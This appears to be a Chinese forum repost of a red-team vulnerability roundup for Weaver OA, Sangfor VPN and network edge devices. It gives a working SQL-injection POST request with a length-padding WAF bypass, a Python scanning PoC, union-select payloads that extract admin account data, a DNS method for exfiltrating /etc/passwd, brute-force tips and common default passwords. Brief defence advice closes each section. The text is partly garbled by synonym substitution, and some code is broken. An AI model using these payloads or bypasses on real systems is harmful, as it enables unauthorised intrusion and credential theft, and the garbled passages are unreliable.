l14107cb 发表于 2024-10-10 04:19:03

护网漏洞汇总②


    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/vl1Efs3jVXk63TAB9ytfUXr2911Wjl5DVHlvCtY2N9d1312yVicxsMVOsdpBqvhuS4vVP64CsZTls0Hp1rDruEg/640?wx_fmt=jpeg&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">十<span style="color: black;">1、</span>泛微OA e-cology SQL注入漏洞</span></strong></p><img src="https://mmbiz.qpic.cn/mmbiz_png/3rC9q1ZEJstC93ELZicJO4zmG3rByPQ8eeWwCVevhItZoLJuvWj1KUuIHnhbY2Z5ddPIdwy4rAjqfMiaCgB0vlDg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">1.漏洞简介</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">泛微OA在国内的用户<span style="color: black;">非常多</span>,漏洞以前<span style="color: black;">亦</span><span style="color: black;">非常多</span>,但<span style="color: black;">此刻</span>在漏洞盒子托管了企业SRC:https://weaversrc.vulbox.com/, <span style="color: black;">状况</span>有所好转</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">2.影响组件</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">泛微OA</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">3.漏洞指纹</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Set-Cookie: ecology_JSessionId= ecology WorkflowCenterTreeData</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">/mobile/plugin/SyncUserInfo.jsp</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">4.Fofa Dork</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">app="泛微-协同办公OA"</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">5.漏洞分析</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">泛微OA WorkflowCenterTreeData接口注入漏洞(限oracle数据库) – 先知社区https://xz.aliyun.com/t/6531</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">6.漏洞利用</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现:</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">修改NULL后为要<span style="color: black;">查找</span>的字段名,修改from后为<span style="color: black;">查找</span>的表:</p><span style="color: black;">POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&amp;scope=<span style="color: black;">2333</span> </span><span style="color: black;">HTTP/<span style="color: black;">1.1</span></span><span style="color: black;">Host: ip:port</span><span style="color: black;">User-Agent: Mozilla/<span style="color: black;">5.0</span> (Macintosh; Intel Mac OS X <span style="color: black;">10.14</span>; rv:<span style="color: black;">56.0</span>) Gecko/<span style="color: black;">20100101</span> Firefox/<span style="color: black;">56.0</span> </span><span style="color: black;">Accept: text/html,application/xhtml+xml,application/xml;<span style="color: black;">q</span>=<span style="color: black;">0</span>.<span style="color: black;">9</span>,*<span style="color: black;">/*;q=0.8</span></span><span style="color: black;">Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 </span><span style="color: black;">Accept-Encoding: gzip, deflate</span><span style="color: black;"><span style="color: black;">Content-Type: application/x</span>-www-form-urlencoded </span><span style="color: black;">Content-Length: <span style="color: black;">2236</span></span><span style="color: black;">Connection: <span style="color: black;">close</span></span><span style="color: black;">Upgrade-Insecure-Requests: <span style="color: black;">1</span></span><span style="color: black;">formids=<span style="color: black;">11111111111</span>)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0 d%0a%0d%0a%0</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_jpg/S4vicVicPn31IFJzicEZNHXZoDv2DAkBzpUx0kMVgEthHfmDQrWn6dKKc0OrbzqjVs4BNEI4TsxHsibEVaJibvRbv6w/640?wx_fmt=jpeg&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">https://github.com/orleven/Tentacle/blob/6e1cecd52b10526c4851a26249339367101b3ca2/script/ecology/ecology8_mobile_sql</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">_inject.py</p><span style="color: black;"><span style="color: black;">#!/usr/bin/env python</span></span><span style="color: black;"><span style="color: black;"># -*- coding: utf-8 -*-</span></span><span style="color: black;"><span style="color: black;"># <span style="color: black;">@author</span>: orleven</span></span><span style="color: black;">from lib.utils.connect import ClientSession</span><span style="color: black;">from script import Script, SERVICE_PORT_MAP</span><span style="color: black;"><span style="color: black;"><span style="color: black;">class</span> <span style="color: black;">POC</span>(<span style="color: black;">Script</span>):</span></span><span style="color: black;"> <span style="color: black;"><span style="color: black;">def</span> <span style="color: black;">__init__</span><span style="color: black;">(<span style="color: black;">self</span>, target=None)</span></span>:</span><span style="color: black;"> <span style="color: black;">self</span>.service_type = SERVICE_PORT_MAP.WEB</span><span style="color: black;"> <span style="color: black;">self</span>.name = <span style="color: black;">ecology8 mobile sql inject</span></span><span style="color: black;"> <span style="color: black;">self</span>.keyword = [<span style="color: black;">ecology8</span>, <span style="color: black;">sql inject</span>]</span><span style="color: black;"> <span style="color: black;">self</span>.info = <span style="color: black;">ecology8 mobile sql inject</span></span><span style="color: black;"> <span style="color: black;">self</span>.type = <span style="color: black;">inject</span></span><span style="color: black;"> <span style="color: black;">self</span>.level = <span style="color: black;">high</span></span><span style="color: black;"> Script.__init_<span style="color: black;">_</span>(<span style="color: black;">self</span>, target=target, service_type=<span style="color: black;">self</span>.service_type)</span><span style="color: black;"> async <span style="color: black;"><span style="color: black;">def</span> <span style="color: black;">prove</span><span style="color: black;">(<span style="color: black;">self</span>)</span></span>:</span><span style="color: black;"> await <span style="color: black;">self</span>.get_url()</span><span style="color: black;"> <span style="color: black;">if</span> <span style="color: black;">self</span>.<span style="color: black;">base_url:</span></span><span style="color: black;"> path_list = list(set([</span><span style="color: black;"> <span style="color: black;">self</span>.url_normpath(<span style="color: black;">self</span>.base_url, <span style="color: black;">/</span>),</span><span style="color: black;"> <span style="color: black;">self</span>.url_normpath(<span style="color: black;">self</span>.url, <span style="color: black;">./</span>),</span><span style="color: black;"> ]))</span><span style="color: black;"> pocs = [<span style="color: black;">"mobile/plugin/browser/WorkflowCenterTreeData.jsp?scope=1&amp;node=root_1&amp;formids=1/1&amp;initvalue=1"</span>, <span style="color: black;"># 注入点为</span></span><span style="color: black;">formids,分母</span><span style="color: black;"> <span style="color: black;">"mobile/plugin/browser/WorkflowCenterTreeData.jsp?scope=1&amp;node=wftype_6/1&amp;formids=1&amp;initvalue=1"</span>] <span style="color: black;"># 注入点为node,</span></span><span style="color: black;">分母</span><span style="color: black;"> async with ClientSession() as <span style="color: black;">session:</span></span><span style="color: black;"> <span style="color: black;">for</span> path <span style="color: black;">in</span> <span style="color: black;">path_list:</span></span><span style="color: black;"> <span style="color: black;">for</span> poc <span style="color: black;">in</span> pocs :</span><span style="color: black;"> url = path + poc</span><span style="color: black;"> async with session.get(url=url) as <span style="color: black;">res:</span></span><span style="color: black;"> <span style="color: black;">if</span> res!=<span style="color: black;">None:</span></span><span style="color: black;"> text = await res.text()</span><span style="color: black;"> <span style="color: black;">if</span> <span style="color: black;">"draggable":false</span> <span style="color: black;">in</span> <span style="color: black;">text:</span></span><span style="color: black;"> <span style="color: black;">self</span>.flag =<span style="color: black;">1</span></span><span style="color: black;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<span style="color: black;">self</span>.req.append({<span style="color: black;">"url"</span>:&nbsp;url})</span><span style="color: black;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <span style="color: black;">self</span>.res.append({<span style="color: black;">"info"</span>:&nbsp;url,&nbsp;<span style="color: black;">"key"</span>:&nbsp;<span style="color: black;">"ecology8&nbsp;inject"</span>})</span><span style="color: black;"> &nbsp;returm</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">应用安全 – 软件漏洞 – 泛微OA漏洞汇总:</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">https://blog.csdn.net/weixin_30855099/article/details/101191532</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">/mobile/plugin/SyncUserInfo.jsp&nbsp;</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">这个<span style="color: black;">亦</span>是有问题的, 但<span style="color: black;">因为</span><span style="color: black;">无</span>公开的分析报告, 漏洞相对简单, <span style="color: black;">这儿</span>不<span style="color: black;">太多</span>描述</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">7.利用技巧</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(1)在这个漏洞补丁之前大概有几十个前台注入, 都差不多, <span style="color: black;">由于</span>没公开<span style="color: black;">这儿</span>就不细说了</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(2)泛微的补丁中间改过一次过滤策略, 打完所有补丁的话, 注入就很难了</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(3)<span style="color: black;">这儿</span><span style="color: black;">能够</span>绕过的<span style="color: black;">原由</span>是泛微某个过滤器初始化错误,当长度超过xssMaxLength=500的时候就不进入安全检测, 修复以后是xssMaxLength=1000000,<span style="color: black;">因此</span>随便你填充%0a%0d还是空格都<span style="color: black;">能够</span>绕过注入检测</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(4)泛微后端数据库版本存在差异, <span style="color: black;">然则</span><span style="color: black;">能够</span>通用检测。已知泛微OA E8存在2个版本的数据库, 一个是mssql, 一个是oracle, 且新旧版本泛微的sql过滤<span style="color: black;">办法</span>并不一致<span style="color: black;">因此</span><span style="color: black;">这儿</span>筛选出一个相对通用的检测手法(下面代码是python的" "*800 800个空格)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">"-1) "+" "*800+ "union select/**/1, Null, Null, Null, Null, Null, Null, Null from Hrmresourcemanager where loginid=(sysadmin" 老版本<span style="color: black;">能够</span>在关键字后面加 /**/ 来绕过sql检测</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">新版本<span style="color: black;">能够</span><span style="color: black;">经过</span>加入<span style="color: black;">海量</span>空格/换行来绕过sql检测mssql,oracle中都有Hrmresourcemanager , 这是管理员信息表</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">就Hrmresource表中<span style="color: black;">无</span>用户, Hrmresourcemanager 表中<span style="color: black;">亦</span><span style="color: black;">必定</span>会存在sysadmin账户,<span style="color: black;">因此</span>进行union select的时候<span style="color: black;">必定</span>会有数据。<span style="color: black;">这儿</span><span style="color: black;">亦</span><span style="color: black;">能够</span><span style="color: black;">运用</span> "-1) "+" "*800+ " or/**/ 1=1 and id&lt;(5",<span style="color: black;">这儿</span><span style="color: black;">运用</span> &lt;5 <span style="color: black;">能够</span>避免信息超过5条, <span style="color: black;">然则</span>会返回<span style="color: black;">秘码</span>等<span style="color: black;">敏锐</span>信息, 不<span style="color: black;">意见</span><span style="color: black;">运用</span>。</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">8.防护<span style="color: black;">办法</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(1)<span style="color: black;">即时</span>更新泛微补丁</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(2)泛微最好不要开放到公网</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(3)<span style="color: black;">运用</span>waf拦击</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/vl1Efs3jVXk63TAB9ytfUXr2911Wjl5DVHlvCtY2N9d1312yVicxsMVOsdpBqvhuS4vVP64CsZTls0Hp1rDruEg/640?wx_fmt=jpeg&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">十<span style="color: black;">2、</span>深信服VPN远程代码执行</span></strong></p><img src="https://mmbiz.qpic.cn/mmbiz_png/3rC9q1ZEJstC93ELZicJO4zmG3rByPQ8eeWwCVevhItZoLJuvWj1KUuIHnhbY2Z5ddPIdwy4rAjqfMiaCgB0vlDg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">1.漏洞简介</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">深信服 VPN 某个特定<span style="color: black;">制品</span>存在远程代码执行, 2019 攻防演练<span style="color: black;">运用</span>过</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2.影响组件:</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;深信服 VPN</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">3.漏洞指纹</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;Set-Cookie: TWFID=welcome to ssl vpn Sinfor</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">4.Fofa Dork</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;header="Set-Cookie: TWFID="</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">5.漏洞分析</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">深 信 服 vpnweb 登 录 逆 向 学 习 :&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; https://www.cnblogs.com/potatsoSec/p/12326356.html</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">6.漏洞利用</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;wget -t %d -T %d --spider %s</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">7.利用技巧</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(1)该版本深信服VPN属于相对<span style="color: black;">初期</span>的版本, 大概2008年<span style="color: black;">上下</span>, 但<span style="color: black;">日前</span>还有761个ip开放在公网</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(2)该版本较低, &nbsp; &nbsp; whomai不存在,<span style="color: black;">能够</span><span style="color: black;">运用</span> uname, <span style="color: black;">这儿</span><span style="color: black;">无</span>空格可dns传出来</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(3)去除空格<span style="color: black;">亦</span>简单 cat /etc/passwd | tr " \n" "+|"</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">8.防护<span style="color: black;">办法</span>1.<span style="color: black;">即时</span>更新补丁2.升级到最新版</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/vl1Efs3jVXk63TAB9ytfUXr2911Wjl5DVHlvCtY2N9d1312yVicxsMVOsdpBqvhuS4vVP64CsZTls0Hp1rDruEg/640?wx_fmt=jpeg&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">十<span style="color: black;">3、</span>深信服 VPN 口令爆破</span></strong></p><img src="https://mmbiz.qpic.cn/mmbiz_png/3rC9q1ZEJstC93ELZicJO4zmG3rByPQ8eeWwCVevhItZoLJuvWj1KUuIHnhbY2Z5ddPIdwy4rAjqfMiaCgB0vlDg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">1.漏洞简介</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">深信服 VPN 针对口令爆破是5次错误锁定IP五分钟, <span style="color: black;">因此</span><span style="color: black;">这儿</span>爆破<span style="color: black;">亦</span>不是不</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;行, <span style="color: black;">重点</span>是测试<span style="color: black;">平常</span>弱口令以及分布式爆破<span style="color: black;">亦</span>不是不行</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">2.影响组件</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;深信服 VPN</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">3.漏洞指纹</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;/por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd=</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">4.Fofa Dork&nbsp;</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">app="深信服-SSL-VPN"</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">5.漏洞分析</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;关于SSL VPN认证时的验证码绕过 – SSL VPN/EMM – 深信服社区</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;https://bbs.sangfor.com.cn/forum.php?mod=viewthread&amp;tid=20633</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;此处存疑, 时间问题<span style="color: black;">无</span>测试</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">6.漏洞利用</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(1)深信服VPN 口令爆破 demo (<span style="color: black;">这儿</span>仅测试了M6,其他的应该差不多)</p><span style="color: black;"><span style="color: black;">#encoding=utf8</span></span><span style="color: black;"><span style="color: black;">import</span> requests</span><span style="color: black;"><span style="color: black;">import</span> hashlib</span><span style="color: black;"><span style="color: black;">import</span> urllib3</span><span style="color: black;">urllib3.disable_warnings()</span><span style="color: black;"><span style="color: black;">import</span> re</span><span style="color: black;">session = requests.session()</span><span style="color: black;"><span style="color: black;"><span style="color: black;">def</span> <span style="color: black;">SanForLogin</span><span style="color: black;">(target, password, username=<span style="color: black;">"admin"</span>)</span>:</span></span><span style="color: black;"> <span style="color: black;"># 加密<span style="color: black;">秘码</span>的算法是 sha1(password+sid)</span></span><span style="color: black;"> <span style="color: black;"># <span style="color: black;">无</span>公开POC就不写了</span></span><span style="color: black;">SanForLogin(<span style="color: black;">"https://xxxxxxxxxxx/"</span>, <span style="color: black;">"admin"</span>)</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">7.利用技巧</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(1)<span style="color: black;">因为</span>深信服<span style="color: black;">触及</span>的版本跨度时间达十几年, <span style="color: black;">非常多</span><span style="color: black;">地区</span>不<span style="color: black;">同样</span>, <span style="color: black;">然则</span>总体都差不太多国外APT组织应该<span style="color: black;">亦</span>批量爆破了一波,加密的<span style="color: black;">秘码</span><span style="color: black;">亦</span><span style="color: black;">便是</span> sha1(password+sid)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">爆破<span style="color: black;">亦</span>就锁一会ip, 夜里丢一边跑着就完事了, 弱口令<span style="color: black;">亦</span>就<span style="color: black;">那样</span>些admin/123456/Sangfor/Sangfor@123&nbsp;</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(2)<span style="color: black;">倘若</span>爆破出来了管理员密码, 管理员后台有好多处命令注入, <span style="color: black;">例如</span>升级工具, <span style="color: black;">这儿</span>讲起来应该是正常功能</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(3)去年传闻还有前台sql注入, <span style="color: black;">然则</span>没拿到补丁, 手头没环境, 就没分析, 看一下乌云上的老洞吧。深信服SSLVPN外置数据中心<span style="color: black;">敏锐</span>信息泄漏&amp;SQL注入漏洞可<span style="color: black;">引起</span>getshell</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">https://www.uedbox.com/post/31092/</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">8.防护<span style="color: black;">办法</span></strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(1)<span style="color: black;">即时</span>更新补丁</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(2)升级到最新版</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/vl1Efs3jVXk63TAB9ytfUXr2911Wjl5DVHlvCtY2N9d1312yVicxsMVOsdpBqvhuS4vVP64CsZTls0Hp1rDruEg/640?wx_fmt=jpeg&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">十<span style="color: black;">3、</span><span style="color: black;">平常</span>边界<span style="color: black;">制品</span>(防火墙, 网关, 路由器, VPN) 弱口令漏洞</span></strong></p><img src="https://mmbiz.qpic.cn/mmbiz_png/3rC9q1ZEJstC93ELZicJO4zmG3rByPQ8eeWwCVevhItZoLJuvWj1KUuIHnhbY2Z5ddPIdwy4rAjqfMiaCgB0vlDg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">1.漏洞简介</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;大型企业<span style="color: black;">常常</span>会配置<span style="color: black;">有些</span>边界设备来<span style="color: black;">守护</span>企业内外网通信, <span style="color: black;">这儿</span><span style="color: black;">亦</span>存在灯下</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;黑的问题, <span style="color: black;">因为</span><span style="color: black;">都数</span>不开源, 漏洞<span style="color: black;">重点</span>以弱口令为主</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">2.影响组件</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">防火墙, 网关, 路由器, VPN</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">3.漏洞指纹</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;防火墙, 网关, 路由器, VPN</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">4.Fofa Dork</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;防火墙, 网关, 路由器, VPN 的名<span style="color: black;">叫作</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">5.漏洞利用</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;【全设备】<span style="color: black;">平常</span>网络安全设备默认口令</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;https://www.it2021.com/security/614.html</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">渗透测试之各厂商防火墙登录IP、初始<span style="color: black;">秘码</span>、技术支持</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;https://mp.weixin.qq.com/s/OLf7QDl6qcsy2FOqCQ2icA</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">6.利用技巧</strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;这个东西好多人不改默认口令, 就算改<span style="color: black;">非常多</span><span style="color: black;">亦</span>是企业<span style="color: black;">特殊</span>弱口令,admin&nbsp;</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;root 123456永远的神</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp;&nbsp;&nbsp;&nbsp;内网的安全平台<span style="color: black;">便是</span>个漏洞指南</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">7.防护<span style="color: black;">办法</span></strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(1)设置强口令</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">(2)限制<span style="color: black;">源自</span>IP</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/vl1Efs3jVXk63TAB9ytfUXr2911Wjl5DVHlvCtY2N9d1312yVicxsMVOsdpBqvhuS4vVP64CsZTls0Hp1rDruEg/640?wx_fmt=jpeg&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">十<span style="color: black;">4、</span>Thinkphp <span style="color: black;">关联</span>漏洞</span></strong></p><img src="https://mmbiz.qpic.cn/mmbiz_png/3rC9q1ZEJstC93ELZicJO4zmG3rByPQ8eeWwCVevhItZoLJuvWj1KUuIHnhbY2Z5ddPIdwy4rAjqfMiaCgB0vlDg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;">
